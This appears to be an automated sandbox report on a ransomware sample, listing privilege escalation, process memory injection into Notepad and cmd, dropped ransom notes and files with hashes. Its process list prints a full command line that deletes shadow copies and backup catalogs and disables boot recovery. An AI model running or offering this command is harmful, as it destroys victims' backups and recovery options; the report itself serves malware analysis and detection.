Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\discord.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\discord.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\discord.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2384 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\discord.exe
PID 2384 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\discord.exe
PID 2384 wrote to memory of 2112 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\discord.exe
PID 1692 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 1692 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2112 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 1692 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2112 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2112 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2112 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 1692 wrote to memory of 112 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 1692 wrote to memory of 112 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 1692 wrote to memory of 112 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 6104 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 6104 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 2112 wrote to memory of 6104 N/A C:\Users\Admin\AppData\Local\discord.exe C:\Windows\SysWOW64\cmd.exe
PID 1692 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 1692 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 1692 wrote to memory of 3460 N/A C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe C:\Windows\SysWOW64\cmd.exe
PID 3568 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3568 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3568 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 112 wrote to memory of 5972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 112 wrote to memory of 5972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 112 wrote to memory of 5972 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe

"C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\discord.exe

C:\Users\Admin\AppData\Local\discord.exe

C:\Users\Admin\AppData\Local\discord.exe

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\APEXNOTE.txt

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\APEXNOTE.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\usb_maker.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\usb_maker.bat" "

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Files

memory/1692-0-0x000000007506E000-0x000000007506F000-memory.dmp

memory/1692-1-0x00000000001B0000-0x00000000001E8000-memory.dmp

memory/1692-2-0x0000000005160000-0x0000000005706000-memory.dmp

memory/1692-3-0x0000000004C90000-0x0000000004D22000-memory.dmp

memory/1692-4-0x0000000075060000-0x0000000075811000-memory.dmp

memory/1692-5-0x00000000050F0000-0x00000000050FA000-memory.dmp

C:\Users\Admin\AppData\Local\discord.exe

MD5 b35a7c0c23349c34d7eaa11be87681b3
SHA1 265a3a1b889a9f3f5bb53f9e5d1cbc7f48d24fe8
SHA256 c032b020f742add231aa1b02c90240cc702d81ccd255c015284c1389ef1e7b6c
SHA512 67a8c9eb39da8f24a48acee027706052d68b59cbad05e9028bafb70ba77a562c8ae1b72c375bcd03ea1846775c577bff005ed148ba8dd0963673c91144846dd2

memory/2112-13-0x0000000075060000-0x0000000075811000-memory.dmp

memory/2112-18-0x0000000075060000-0x0000000075811000-memory.dmp

C:\Users\Admin\AppData\Roaming\ID

MD5 14e050f2de3af37d89acacd5952e448f
SHA1 d49aa9fe1054c9742734431fde1e4246277c4e78
SHA256 a80b39dc1f966c74bbaf7aa388b96345914cdfb29a6e8036445a05eb57223989
SHA512 66bc6469cb05ee3d1395e82a94f9573574d9646dc1c83a2ca61171cc6f0fcbb8ffc741ac8f7621dfdf63bca91ef7557c124a645e5bb2b3987a08d3888fd5a9e7

C:\Users\Admin\AppData\Roaming\fondo_antiguo.jpg

MD5 25342190bcc364d32b9e9f9928b5a8a5
SHA1 3ae3bdabaed70dba1fd96c0be72e17aa91c7802a
SHA256 d626e482d44f5fc8eb1c9b2cd08070150ab99afe40cf6dc939015b01b09088f4
SHA512 c0f4f1831f289d4d60e9323e36689c2e0aaa9a7de3dbe4e65b2974d26d3f6f480a7160f5eff2ad458f8b0a7f36057bfba9c7a1b62769091b02640176bd2e53c3

C:\Windows\System32\drivers\etc\hosts

MD5 de941294418545204a4ec21837641098
SHA1 5b6c90046d37841e0096b1f85d021836f2b09639
SHA256 1d7320e6895f426fe4f7bf535b0a63e8308202a6d1a7b790498c45ad5fc58cea
SHA512 fcecb0fee780eda474576afb6fa799fadb5a82d1eb725f93bdcdc4bd7617361f254d03510cbb7f50b1f056e15dd51f56d4a5027e21b4d6289a5e283e0a6b0daf

C:\Users\Admin\Pictures\Camera Roll\APEXNOTE.txt

MD5 bdba72b1177bdfc5dee1d9941fdcae45
SHA1 a7713959c8f0a6d8d7a6169665e87b009ac04b10
SHA256 dd1e78ae51782f025cad303019e331c493d20bc0f7f71c0c186a85be24ee13be
SHA512 3eca03cd090b483beb4e2009a535905ce6ac8100782f46dd681db1e2e25960cd854d303f2820225581b6e25a89925f0199fa022887a5c3c59f53297eb0884b5a

C:\Users\Admin\Music\APEXNOTE.txt

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\usb_maker.bat

MD5 a3746bab405f8aeb6ab31685c0c22c46
SHA1 76e958a8452c71ec5e22b333f31716bee424a17d
SHA256 df54081b8fc400d35da1e013e99592dbe8d2b3dbee289d0d0b5136e9ef555126
SHA512 f541dc434d9d43e3ee2bba29d3c2113a80fbadf734d812b9c0d50ad9b62ca83b3cab8a56db964da9b4a9e031208cd2fd4f86ec8c6a7ff68d6c3e8f26369111c3

memory/1692-300-0x0000000075060000-0x0000000075811000-memory.dmp

memory/2112-301-0x0000000075060000-0x0000000075811000-memory.dmp